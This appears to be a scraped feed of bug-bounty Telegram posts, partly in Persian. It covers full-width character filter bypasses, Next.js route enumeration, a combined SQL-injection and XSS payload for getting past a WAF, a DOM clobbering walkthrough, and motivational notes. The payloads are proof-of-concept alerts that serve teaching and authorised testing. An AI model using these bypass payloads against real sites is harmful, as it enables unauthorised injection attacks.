Forwarded from GitBook - Bug Bounty
Try the Full-Width version of the commonly used symbols for XSS/WAF/SQL filter bypass.
🔹< - %EF%BC%9C (\uff1c)
🔹> - %EF%BC%9E (\uff1e)
🔹\ - %EF%BC%BC (\uff3c)
🔹/ - %EF%BC%8F (\uff0f)
🔹' - %EF%BC%87 (\uff07)
🔹" - %EF%BC%82 (\uff02)
🔹< - %EF%BC%9C (\uff1c)
🔹> - %EF%BC%9E (\uff1e)
🔹\ - %EF%BC%BC (\uff3c)
🔹/ - %EF%BC%8F (\uff0f)
🔹' - %EF%BC%87 (\uff07)
🔹" - %EF%BC%82 (\uff02)
❤2🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
Fetch all relative URLs in next.js websites 🗡
const manifest = window.__BUILD_MANIFEST || {};const routes = Object.keys(manifest).filter(route => !route.startsWith("_")).sort();routes
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from BugBounty & Hacking Resources (Meydi)
چقدر چنل باگ بانتی و امنیت زیاد شده😂
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
👍4🤣2❤1
Motivation comes and goes, and ultimately you can't rely on it if you want to achieve mastery in your craft. Come up with a habit ("I will hack for two hours every morning") or work on something else if you feel tired. I often get tired of manual testing, and I switch to writing code for a new tool or something similar, just to change the pace of work. Many hackers suffer from ADHD, and it can be difficult for them to focus on one specific thing; I believe that if you are doing anything, even listening to a hacker podcast, you are already doing well. Step by step, meter by meter. Manage your energy properly, and you will see that making progress becomes easier.
انگیزه می آید و می رود و در نهایت اگر بخواهید در حرفه خود به تسلط برسید نمی توانید به آن تکیه کنید. یک عادت داشته باشید ("من هر روز صبح دو ساعت هک خواهم کرد") یا اگر احساس خستگی کردید روی چیز دیگری کار کنید. من اغلب از تست دستی خسته می شوم و فقط برای تغییر سرعت کار، به نوشتن کد برای یک ابزار جدید یا چیزی شبیه به آن تغییر می کنم. بسیاری از هکرها از ADHD رنج می برند و تمرکز روی یک چیز خاص برای آنها دشوار است. من معتقدم که اگر هر کاری انجام می دهید، حتی به پادکست هکر گوش می دهید، در حال حاضر خوب انجام می دهید. گام به گام، متر به متر. انرژی خود را به درستی مدیریت کنید، خواهید دید که پیشرفت آسان تر می شود.
انگیزه می آید و می رود و در نهایت اگر بخواهید در حرفه خود به تسلط برسید نمی توانید به آن تکیه کنید. یک عادت داشته باشید ("من هر روز صبح دو ساعت هک خواهم کرد") یا اگر احساس خستگی کردید روی چیز دیگری کار کنید. من اغلب از تست دستی خسته می شوم و فقط برای تغییر سرعت کار، به نوشتن کد برای یک ابزار جدید یا چیزی شبیه به آن تغییر می کنم. بسیاری از هکرها از ADHD رنج می برند و تمرکز روی یک چیز خاص برای آنها دشوار است. من معتقدم که اگر هر کاری انجام می دهید، حتی به پادکست هکر گوش می دهید، در حال حاضر خوب انجام می دهید. گام به گام، متر به متر. انرژی خود را به درستی مدیریت کنید، خواهید دید که پیشرفت آسان تر می شود.
🔥5❤3🤣3👏2
Interesting way to bypass WAF when you need to use the </noscript> tag:
Inspired by: https://x.com/_0x999?s=21
The WAF first checks for SQLi, so ignore the comment section.
e.g:
https://x.com/neotrony/status/1931790830336884973?s=2
Inspired by: https://x.com/_0x999?s=21
meydi" or 1=/*</noscript>*/ -- - <XSS>
The WAF first checks for SQLi, so ignore the comment section.
e.g:
meydi" or 1=/*</noscript>*/ -- - x=/*<details open=\" ontoggle=x=atob;z=x`amF2YXNjcmlwdDphbGVydChvcmlnaW4p`;location=z */>
https://x.com/neotrony/status/1931790830336884973?s=2
❤4
This is how DOM clobbering works.
When you create an element with an id, the browser automatically creates a global variable for that ID:
Now
But when you create multiple elements with the same id:
Now
Add a name attribute:
And
Now combine that with a common JS pattern like:
This is meant to provide a fallback if the global doesn't exist. However, if
Now imagine this JS logic:
If an attacker clobbered
If HTML is set via innerHTML or similar, then this could render as:
When you create an element with an id, the browser automatically creates a global variable for that ID:
<a id="foo"></a>
Now
window.foopoints to that single element.
But when you create multiple elements with the same id:
<a id="foo"></a>
<a id="foo"></a>
Now
becomes an HTMLCollection, not a single element.
window.foo
Add a name attribute:
<a id="foo" name="bar" href="..."></a>
And
now points to that element (works in Chromium/WebKit browsers, but not Firefox).
window.foo.bar
Now combine that with a common JS pattern like:
var someObject = window.someObject || {};
This is meant to provide a fallback if the global doesn't exist. However, if
window.someObjecthas been clobbered by injected HTML, the fallback silently trusts a DOM object instead of a real JS object.
Now imagine this JS logic:
let imgSrc = someObject.avatar;
If an attacker clobbered
someObject.avatarwith:
<a id=someObject></a>
<a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>
If HTML is set via innerHTML or similar, then this could render as:
<img src="cid:" onerror="alert(1)//"">
❤2🔥2